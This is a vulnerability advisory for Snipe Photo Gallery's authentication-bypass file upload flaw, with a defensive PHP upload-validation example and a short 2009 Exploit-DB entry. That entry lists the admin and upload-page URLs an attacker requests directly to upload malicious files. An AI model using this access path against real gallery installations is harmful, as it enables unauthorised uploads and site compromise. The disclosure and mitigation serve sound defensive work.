Vendor: Snipe Photo Gallery
By: indoushka
CVSS: 7.5 (HIGH)
Bug: Remote Upload
CWE: 434
Product Name: Snipe Photo Gallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux Français v.(9.4 Ubuntu)
2009

Snipe Photo Gallery by Pass Remote Upload Vulnerability

An attacker can exploit this vulnerability by accessing the admin area of the Snipe Photo Gallery application and then accessing the upload page. This allows the attacker to upload malicious files to the application.

Mitigation:

Configure the application to accept uploads only with the appropriate file extensions, and only from trusted sources.
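One way to implement both parts of this mitigation in a PHP upload endpoint, as an added example that is not Snipe Gallery's code and not part of the original advisory. The session key `is_admin`, the form field `photo` and the `UPLOAD_DIR` path are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed names (not from Snipe Gallery): session key 'is_admin', form field
// 'photo', and an upload directory that lies outside the web root.
const UPLOAD_DIR = '/var/lib/gallery/uploads';
const ALLOWED = [                       // extension => MIME type the content must have
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png' => 'image/png',  'gif'  => 'image/gif',
];

/** Returns a server-generated file name, or throws if the upload is rejected. */
function validate_image(string $tmpPath, string $clientName): string
{
    // Allow-list on the final extension only: "x.jpg.php" is judged as "php"
    // and rejected; a deny-list of "bad" extensions is never complete.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Content must agree with the extension; $_FILES[...]['type'] is client-supplied.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED[$ext] || getimagesize($tmpPath) === false) {
        throw new RuntimeException('content is not the declared image type');
    }
    // Discard the client's file name; keep only the vetted extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

session_start();
// "Trusted sources": the upload action itself checks the session on every request.
if (empty($_SESSION['is_admin'])) {
    http_response_code(403);
    exit('forbidden');
}
$file = $_FILES['photo'] ?? null;
if (!is_array($file) || $file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
    http_response_code(400);
    exit('bad upload');
}
try {
    $name = validate_image($file['tmp_name'], $file['name']);
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
} catch (RuntimeException $e) {
    http_response_code(422);
    exit('rejected');
}
```

Serving stored files from a directory where the web server does not execute scripts limits the impact if a check is ever bypassed.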

Exploit-DB raw data:

========================================================================================
| # Title    : Snipe Photo Gallery by Pass Remote Upload Vulnerability
| # Author   : indoushka
| # Home     : www.dz-blackhat.com
| # Tested on: Linux Français v.(9.4 Ubuntu)
| # Bug      : Remote Upload
======================      Exploit By indoushka       =================================
 # Exploit  :

     1- http://127.0.0.1/snipegallery/admin/index.php (Admin Area)

     2- http://127.0.0.1/snipegallery/admin/index.php?action=add&cat_id=3 (Upload Page)
     
                    